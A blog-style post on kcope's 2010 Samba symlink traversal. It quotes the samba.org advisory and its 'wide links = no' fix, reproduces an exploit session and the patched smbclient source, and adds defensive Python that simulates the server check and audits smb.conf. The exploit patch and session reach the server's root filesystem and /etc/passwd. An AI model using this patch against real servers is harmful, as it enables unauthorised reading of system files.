pyth0n3

Claimed Zero Day exploit in Samba


Posted 5 February 2010

A user named "kcopedarookie" posted what they claim to be a video of a zero-day exploit in Samba on YouTube yesterday.

The video shows modifications to smbclient allowing /etc/passwd to be downloaded from a remote server.

The issue is actually a default insecure configuration in Samba.

Quick FAQ: What do I do?

Set:

wide links = no

in the [global] section of your smb.conf and restart smbd to eliminate this problem.

Longer FAQ: The real issue

The problem comes from a combination of two features in Samba, each of which on its own is useful to administrators, but which in combination allow users to access any file on the system that their logged-in username has permission to read (this is not a privilege escalation problem).

By default Samba ships with the parameter "wide links = yes", which allows administrators to add, locally on the server, a symbolic link inside an exported share that SMB/CIFS clients will follow.

As an example, given a share definition:

[tmp]
    path = /tmp
    read only = no
    guest ok = yes

The administrator could add a symlink:

$ ln -s /etc/passwd /tmp/passwd

and SMB/CIFS clients would then see a file called "passwd" within the [tmp] share; reading it would return the contents of /etc/passwd.

If the "wide links" parameter is set to "no", any attempt to read this file will fail with an "access denied" error.

The problem occurs as Samba allows clients using the UNIX extensions (which are also turned on by default) to create symlinks on remotely mounted shares on which they have write access that point to any path on the file system.

This is by design, as applications running on UNIX clients may have good reasons to create symlinks anywhere on the filesystem they have write access that point to local files (such as /etc/passwd).

UNIX clients will resolve these links locally, but Windows clients will resolve them on the server. It is this combination that causes the problem.

All future versions of Samba will have the parameter "wide links" set to "no" by default, and the manual pages will be updated to explain this issue.

Source: samba.org

Exploit session (using the patched smbclient exploit):

smb is a Samba user that was created for this.

root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\>

put and get work in the folder now!

List open shares (this is normal operation, not an exploit):

root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Sharename Type Comment
--------- ---- -------
testmount Disk // < this share is writable and exploitable!!
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Server Comment
--------- -------
NR-PENTEST nr-pentest server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP NR-PENTEST


smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
        TALLOC_CTX *ctx = talloc_tos();
        char *oldname = NULL;
        char *newname = NULL;
        char *buf = NULL;
        char *buf2 = NULL;
        char *targetname = NULL;
        struct cli_state *targetcli;

        if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
            !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
                d_printf("symlink <oldname> <newname>\n");
                return 1;
        }
        /* The two talloc_asprintf() calls below no longer prepend
         * client_get_cur_dir(), so the link target and the link name are
         * sent to the server exactly as typed (e.g. "../../../../../"). */
        oldname = talloc_asprintf(ctx,
                        "%s", // << HERE modified
                        buf);
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s", // << HERE modified
                        buf2);
        if (!newname) {
                return 1;
        }
        /* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
        oldname = talloc_asprintf(ctx,
                        "%s%s", // < modified (see above)
                        client_get_cur_dir(), // < removed (see above)
                        buf);
        if (!oldname) {
                return 1;
        }
        newname = talloc_asprintf(ctx,
                        "%s%s", // < modified (see above)
                        client_get_cur_dir(), // < removed (see above)
                        buf2);
        if (!newname) {
                return 1;
        }
        ----------------------------------------------*/

        if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
                d_printf("link %s: %s\n", oldname, cli_errstr(cli));
                return 1;
        }

        if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
                d_printf("Server doesn't support UNIX CIFS calls.\n");
                return 1;
        }

        if (!cli_unix_symlink(targetcli, targetname, newname)) {
                d_printf("%s symlinking files (%s -> %s)\n",
                         cli_errstr(targetcli), newname, targetname);
                return 1;
        }

        return 0;
}


// Cheers,
// kcope
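The following is an added example, not code from the post, from kcope or from the Samba project. It simulates the server-side check that "wide links = no" adds when smbd maps a client path onto the filesystem, using a constructed share directory that mirrors the session above: the "foobar" link a client creates with the patched smbclient (`symlink ../../../../../ foobar`) and the "passwd" link the advisory's administrator creates by hand. The function names and the NT_STATUS strings returned are this example's own; it does not talk to a real smbd.

```python
"""Added example: what "wide links = no" changes in server-side path resolution.

Constructed share layout (not from the page): a subdir, a file, a symlink to
/etc/passwd (the advisory's admin-created link) and a symlink climbing out of
the share (the client-created link from kcope's session).
"""
import os
import tempfile


class AccessDenied(Exception):
    """Stands in for the NT_STATUS_* error smbd hands back to the client."""


def resolve_in_share(share_root, client_path, wide_links):
    """Map an SMB client path onto the server filesystem.

    Paths containing '..' components are rejected before any symlink is
    looked at (the NT_STATUS_OBJECT_PATH_SYNTAX_BAD seen for 'ls ..' in the
    session); that check does not depend on the wide links setting.  With
    wide_links=True the resolved path is returned wherever the symlinks lead.
    With wide_links=False the resolved path must stay under the share root.
    """
    root = os.path.realpath(share_root)
    parts = [p for p in client_path.replace("\\", "/").split("/") if p and p != "."]
    if ".." in parts:
        raise AccessDenied("NT_STATUS_OBJECT_PATH_SYNTAX_BAD")
    resolved = os.path.realpath(os.path.join(root, *parts))
    if not wide_links and resolved != root and not resolved.startswith(root + os.sep):
        raise AccessDenied("NT_STATUS_ACCESS_DENIED")
    return resolved


def resolve_or_status(share_root, client_path, wide_links):
    """Return the resolved path, or the status string the client would see."""
    try:
        return resolve_in_share(share_root, client_path, wide_links)
    except AccessDenied as err:
        return str(err)


def build_demo_share():
    """Create the constructed share in a temp dir and return its real path.

    'foobar' uses enough '../' components to reach '/' however deep the temp
    directory lives; kcope's '../../../../../' relied on the server's layout.
    """
    base = tempfile.mkdtemp(prefix="smb-share-")
    root = os.path.realpath(os.path.join(base, "testmount"))
    os.makedirs(os.path.join(root, "test"))
    with open(os.path.join(root, "xxx"), "w") as fh:
        fh.write("x" * 1955)
    os.symlink("/etc/passwd", os.path.join(root, "passwd"))          # admin-created
    os.symlink("../" * (root.count("/") + 1), os.path.join(root, "foobar"))  # client-created
    return root


if __name__ == "__main__":
    share = build_demo_share()
    for wide in (True, False):
        print(f"wide links = {'yes' if wide else 'no'}")
        for client_path in ("test", "foobar", "foobar/etc", "passwd", ".."):
            print(f"  {client_path:12s} -> {resolve_or_status(share, client_path, wide)}")
```

With wide links on, "foobar" resolves to "/" and "foobar/etc" to "/etc", which is exactly the listing in the session; with it off, both come back as access denied while "test" inside the share still works. The "passwd" case shows that the same setting also blocks the administrator's own out-of-share link, which is why the advisory calls it a trade-off rather than a pure bug fix.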

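The next block is also an added example, not part of the post or of Samba. It audits an smb.conf for the combination the advisory describes (unix extensions on, wide links effectively on, share writable) and emits a copy with "wide links = no" forced in [global], the fix the Quick FAQ gives. It assumes the Samba 3.4 defaults the post states (wide links = yes, unix extensions = yes) and Samba's usual "read only" default of yes; the parsing is a deliberately small subset of what smbd accepts (no includes, no %-macros). The sample configuration is constructed from the advisory's [tmp] share and the "testmount" share in the session.

```python
"""Added example: find shares exposed by wide links + unix extensions and fix them."""
import re

# Defaults assumed from the post (Samba 3.4.x) plus Samba's "read only" default.
DEFAULTS = {"wide links": "yes", "unix extensions": "yes", "read only": "yes"}
# Inverted synonyms Samba accepts for "read only".
WRITABLE_SYNONYMS = ("writable", "writeable", "write ok")
SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")

SAMPLE_SMB_CONF = """\
# constructed sample: the advisory's [tmp] share plus kcope's testmount share
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)

[tmp]
   path = /tmp
   read only = no
   guest ok = yes

[testmount]
   path = /srv/testmount
   writable = yes

[print$]
   path = /var/lib/samba/printers
   ; read only by default
"""


def norm(name):
    """Samba ignores case and internal whitespace in parameter names."""
    return " ".join(name.lower().split())


def is_yes(value):
    return value.strip().lower() in ("yes", "true", "1")


def parse_smb_conf(text):
    """Return {section: {param: value}}; comments (# or ;) and blanks dropped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        match = SECTION_RE.match(line)
        if match:
            current = match.group(1).lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][norm(key)] = value.strip()
    return sections


def effective(sections, share, param):
    """Share-level value, else the [global] value, else the built-in default."""
    glob = sections.get("global", {})
    return sections[share].get(param, glob.get(param, DEFAULTS[param]))


def share_writable(params):
    for syn in WRITABLE_SYNONYMS:
        if syn in params:
            return is_yes(params[syn])
    return not is_yes(params.get("read only", DEFAULTS["read only"]))


def audit(text):
    """Names of shares where a client with write access can plant an escaping symlink."""
    sections = parse_smb_conf(text)
    unix_ext = sections.get("global", {}).get("unix extensions", DEFAULTS["unix extensions"])
    if not is_yes(unix_ext):
        return []  # clients cannot create symlinks remotely at all
    return [share for share, params in sections.items()
            if share != "global"
            and is_yes(effective(sections, share, "wide links"))
            and share_writable(params)]


def harden(text):
    """Set 'wide links = no' in [global] and drop per-share overrides of it."""
    out, current, global_idx, global_has_wide = [], None, None, False
    for raw in text.splitlines():
        match = SECTION_RE.match(raw.strip())
        if match:
            current = match.group(1).lower()
            if current == "global":
                global_idx = len(out)
            out.append(raw)
            continue
        line = raw.strip()
        if line and line[0] not in "#;" and "=" in line and norm(line.partition("=")[0]) == "wide links":
            if current == "global":
                out.append("   wide links = no")
                global_has_wide = True
            continue  # a per-share "wide links = yes" would undo the global fix
        out.append(raw)
    if global_idx is None:
        out = ["[global]", "   wide links = no", ""] + out
    elif not global_has_wide:
        out.insert(global_idx + 1, "   wide links = no")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("exposed shares:", audit(SAMPLE_SMB_CONF))
    print(harden(SAMPLE_SMB_CONF))
```

On a live host the effective value can be confirmed with `testparm -s -v | grep -i 'wide links'` after restarting smbd; the script is for reviewing a config offline. Note that it only flags the remote-symlink combination: an administrator's own out-of-share symlink (the /tmp/passwd case in the advisory) is still followed until wide links is off, which the hardened output takes care of.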
